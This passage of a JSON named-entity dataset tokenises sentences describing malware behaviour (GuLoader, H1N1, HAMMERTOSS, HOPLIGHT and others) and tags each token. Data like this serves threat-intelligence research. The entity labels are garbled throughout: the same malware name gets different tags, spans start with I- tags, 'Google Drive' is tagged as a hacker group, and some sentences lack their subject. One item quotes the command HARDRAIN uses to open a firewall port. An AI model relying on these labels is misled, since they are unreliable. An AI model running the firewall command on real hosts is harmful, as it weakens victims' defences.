"O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "collect", - "the", - "OS,", - "and", - "build", - "version", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "used", - "<code>Accept-Language</code>", - "to", - "identify", - "hosts", - "in", - "the", - "United", - "Kingdom,", - "United", - "States,", - "France,", - "and", - "Spain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Area", - "O", - "I-Area", - "O", - "B-Area", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "identify", - "the", - "country", - "code", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "enumerate", - "the", - "IP", - "and", - "domain", - "of", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "identify", - "the", - "user", - "id", - "on", - "a", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "sleep", - "for", - "195", - "-", - "205", - "seconds", - "after", - "payload", - "execution", - "and", - "before", - "deleting", - "its", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "use", - "the", - "Windows", - "Command", - "Shell", - "to", - "execute", - "commands,", - "including", - "its", - "own", - "removal." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "can", - "delete", - "its", - "executable", - "from", - "the", - "<code>AppData\\Local\\Temp</code>", - "directory", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "can", - "download", - "further", - "malware", - "for", - "execution", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "GuLoader", - "executable", - "has", - "been", - "retrieved", - "via", - "embedded", - "macros", - "in", - "malicious", - "Word", - "documents." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "links", - "to", - "malicious", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "can", - "use", - "a", - "number", - "of", - "different", - "APIs", - "for", - "discovery", - "and", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "the", - "ability", - "to", - "inject", - "shellcode", - "into", - "a", - "donor", - "processes", - "that", - "is", - "started", - "in", - "a", - "suspended", - "state.", - "GuLoader", - "has", - "previously", - "used", - "RegAsm", - "as", - "a", - "donor", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "can", - "establish", - "persistence", - "via", - "the", - "Registry", - "under", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "been", - "spread", - "in", - "phishing", - "campaigns", - "using", - "malicious", - "web", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "the", - "ability", - "to", - "perform", - "anti-VM", - "and", - "anti-sandbox", - "checks", - "using", - "string", - "hashing,", - "the", - "API", - "call", - "<code>EnumWindows</code>,", - "and", - "checking", - "for", - "Qemu", - "guest", - "agent." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "the", - "ability", - "to", - "perform", - "anti-debugging", - "based", - "on", - "time", - "checks,", - "API", - "calls,", - "and", - "CPUID." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GuLoader", - "can", - "use", - "HTTP", - "to", - "retrieve", - "additional", - "binaries." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GuLoader", - "has", - "the", - "ability", - "to", - "download", - "malware", - "from", - "Google", - "Drive." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "bypasses", - "user", - "access", - "control", - "by", - "using", - "a", - "DLL", - "hijacking", - "vulnerability", - "in", - "the", - "Windows", - "Update", - "Standalone", - "Installer", - "(wusa.exe)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "H1N1", - "dumps", - "usernames", - "and", - "passwords", - "from", - "Firefox,", - "Internet", - "Explorer,", - "and", - "Outlook." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "obfuscates", - "C2", - "traffic", - "with", - "an", - "altered", - "version", - "of", - "base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "kills", - "and", - "disables", - "services", - "for", - "Windows", - "Firewall." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "H1N1", - "kills", - "and", - "disables", - "services", - "for", - "Windows", - "Security", - "Center,", - "and", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "H1N1", - "contains", - "a", - "command", - "to", - "download", - "and", - "execute", - "a", - "file", - "from", - "a", - "remotely", - "hosted", - "URL", - "using", - "WinINet", - "HTTP", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "disable", - "recovery", - "options", - "and", - "deletes", - "shadow", - "copies", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "uses", - "multiple", - "techniques", - "to", - "obfuscate", - "strings,", - "including", - "XOR." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "H1N1", - "has", - "functionality", - "to", - "copy", - "itself", - "to", - "removable", - "media." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "H1N1", - "uses", - "a", - "custom", - "packing", - "algorithm." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "encrypts", - "C2", - "traffic", - "using", - "an", - "RC4", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "has", - "functionality", - "to", - "copy", - "itself", - "to", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "H1N1", - "kills", - "and", - "disables", - "services", - "by", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "delete", - "a", - "specified", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "execute", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "obtain", - "information", - "about", - "running", - "processes", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "obtain", - "screenshots", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "obtain", - "information", - "about", - "the", - "OS,", - "processor,", - "and", - "BIOS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HALFBAKED", - "can", - "use", - "WMI", - "queries", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "HAMMERTOSS", - "exfiltrates", - "data", - "by", - "uploading", - "it", - "to", - "accounts", - "created", - "by", - "the", - "actors", - "on", - "Web", - "cloud", - "storage", - "providers", - "for", - "the", - "adversaries", - "to", - "retrieve", - "later." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAMMERTOSS", - "has", - "used", - "<code>-WindowStyle", - "hidden</code>", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "\"tDiscoverer\"", - "variant", - "of", - "HAMMERTOSS", - "establishes", - "a", - "C2", - "channel", - "by", - "downloading", - "resources", - "from", - "Web", - "services", - "like", - "Twitter", - "and", - "GitHub.", - "HAMMERTOSS", - "binaries", - "contain", - "an", - "algorithm", - "that", - "generates", - "a", - "different", - "Twitter", - "handle", - "for", - "the", - "malware", - "to", - "check", - "for", - "instructions", - "every", - "day." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAMMERTOSS", - "is", - "known", - "to", - "use", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HAMMERTOSS", - "is", - "controlled", - "via", - "commands", - "that", - "are", - "appended", - "to", - "image", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "being", - "appended", - "to", - "image", - "files,", - "HAMMERTOSS", - "commands", - "are", - "encrypted", - "with", - "a", - "key", - "composed", - "of", - "both", - "a", - "hard-coded", - "value", - "and", - "a", - "string", - "contained", - "on", - "that", - "day's", - "tweet.", - "To", - "decrypt", - "the", - "commands,", - "an", - "investigator", - "would", - "need", - "access", - "to", - "the", - "intended", - "malware", - "sample,", - "the", - "day's", - "tweet,", - "and", - "the", - "image", - "file", - "containing", - "the", - "command." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "\"Uploader\"", - "variant", - "of", - "HAMMERTOSS", - "visits", - "a", - "hard-coded", - "server", - "over", - "HTTP/S", - "to", - "download", - "the", - "images", - "HAMMERTOSS", - "uses", - "to", - "receive", - "commands." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "download", - "and", - "execute", - "a", - "second-stage", - "payload." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "collect", - "system", - "information,", - "including", - "computer", - "name,", - "system", - "manufacturer,", - "IsDebuggerPresent", - "state,", - "and", - "execution", - "path." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "collect", - "the", - "victim", - "user", - "name." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HARDRAIN", - "opens", - "the", - "Windows", - "Firewall", - "to", - "modify", - "incoming", - "connections." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HARDRAIN", - "binds", - "and", - "listens", - "on", - "port", - "443", - "with", - "a", - "FakeTLS", - "method." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HARDRAIN", - "uses", - "FakeTLS", - "to", - "communicate", - "with", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HARDRAIN", - "uses", - "the", - "command", - "<code>cmd.exe", - "/c", - "netsh", - "firewall", - "add", - "portopening", - "TCP", - "443", - "\"adp\"</code>", - "and", - "makes", - "the", - "victim", - "machine", - "function", - "as", - "a", - "proxy", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HARDRAIN", - "uses", - "cmd.exe", - "to", - "execute", - "<code>netsh</code>commands." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "encrypted", - "data", - "with", - "XOR", - "before", - "sending", - "it", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "used", - "an", - "OLE", - "object", - "that", - "uses", - "Equation", - "Editor", - "to", - "drop", - "the", - "embedded", - "shellcode." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "encrypted", - "the", - "payload", - "with", - "an", - "XOR-based", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "sent", - "system", - "information", - "and", - "files", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerabilities", - "CVE-2017-11882", - "and", - "CVE-2018-0802", - "to", - "deliver", - "the", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "the", - "ability", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "leveraged", - "several", - "Windows", - "API", - "calls", - "to", - "create", - "processes,", - "gather", - "disk", - "information,", - "and", - "detect", - "debugger", - "activity." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "HAWKBALL", - "can", - "collect", - "the", - "OS", - "version,", - "architecture", - "information,", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "can", - "collect", - "the", - "user", - "name", - "of", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "used", - "HTTP", - "to", - "communicate", - "with", - "a", - "single", - "hard-coded", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HAWKBALL", - "has", - "created", - "a", - "cmd.exe", - "reverse", - "shell,", - "executed", - "commands,", - "and", - "uploaded", - "output", - "via", - "the", - "command", - "line." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HDoor", - "kills", - "anti-virus", - "found", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HDoor", - "scans", - "to", - "identify", - "open", - "ports", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "can", - "use", - "an", - "embedded", - "RSA-2048", - "public", - "key", - "to", - "encrypt", - "victim", - "data", - "for", - "ransom." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "can", - "delete", - "volume", - "shadow", - "copies", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "has", - "the", - "ability", - "to", - "enumerate", - "network", - "resources." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "can", - "search", - "for", - "specific", - "processes", - "to", - "terminate." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "can", - "enumerate", - "logical", - "drives", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HELLOKITTY", - "can", - "use", - "WMI", - "to", - "delete", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HIDEDRV", - "injects", - "a", - "DLL", - "for", - "Downdelph", - "into", - "the", - "explorer.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "HIDEDRV", - "is", - "a", - "rootkit", - "that", - "hides", - "certain", - "operating", - "system", - "artifacts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "strings", - "in", - "HOMEFRY", - "are", - "obfuscated", - "with", - "XOR", - "x56." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOMEFRY", - "can", - "perform", - "credential", - "dumping." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOMEFRY", - "uses", - "a", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "can", - "enumerate", - "device", - "drivers", - "located", - "in", - "the", - "registry", - "at", - "`HKLM\\Software\\WBEM\\WDM`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "modified", - "the", - "firewall", - "using", - "netsh." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "used", - "its", - "C2", - "channel", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "multiple", - "C2", - "channels", - "in", - "place", - "in", - "case", - "one", - "fails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "been", - "observed", - "enumerating", - "system", - "drives", - "and", - "partitions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "the", - "ability", - "to", - "connect", - "to", - "a", - "remote", - "host", - "in", - "order", - "to", - "upload", - "and", - "download", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "modified", - "Managed", - "Object", - "Format", - "(MOF)", - "files", - "within", - "the", - "Registry", - "to", - "run", - "specific", - "commands", - "and", - "create", - "persistence", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "connected", - "outbound", - "over", - "TCP", - "port", - "443", - "with", - "a", - "FakeTLS", - "method." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "been", - "observed", - "loading", - "several", - "APIs", - "associated", - "with", - "Pass", - "the", - "Hash." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-OffAct", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "injected", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "multiple", - "proxy", - "options", - "that", - "mask", - "traffic", - "between", - "the", - "malware", - "and", - "the", - "remote", - "operators." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Org" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "HOPLIGHT", - "hooks", - "lsass.exe,", - "and", - "lsass.exe", - "then", - "checks", - "the", - "Registry", - "for", - "the", - "data", - "value", - "'rdpproto'", - "under", - "the", - "key", - "<code>SYSTEM\\CurrentControlSet\\Control\\Lsa", - "Name</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "the", - "capability", - "to", - "harvest", - "credentials", - "and", - "passwords", - "from", - "the", - "SAM", - "database." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "used", - "svchost.exe", - "to", - "execute", - "a", - "malicious", - "DLL", - "." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "utilized", - "Zlib", - "compression", - "to", - "obfuscate", - "the", - "communications", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "been", - "observed", - "collecting", - "victim", - "machine", - "information", - "like", - "OS", - "version,", - "volume", - "information,", - "and", - "more." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "been", - "observed", - "collecting", - "system", - "time", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "can", - "launch", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "has", - "used", - "WMI", - "to", - "recompile", - "the", - "Managed", - "Object", - "Format", - "(MOF)", - "files", - "in", - "the", - "WMI", - "repository." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "HOPLIGHT", - "can", - "use", - "WMI", - "event", - "subscriptions", - "to", - "create", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTRAN", - "can", - "inject", - "into", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 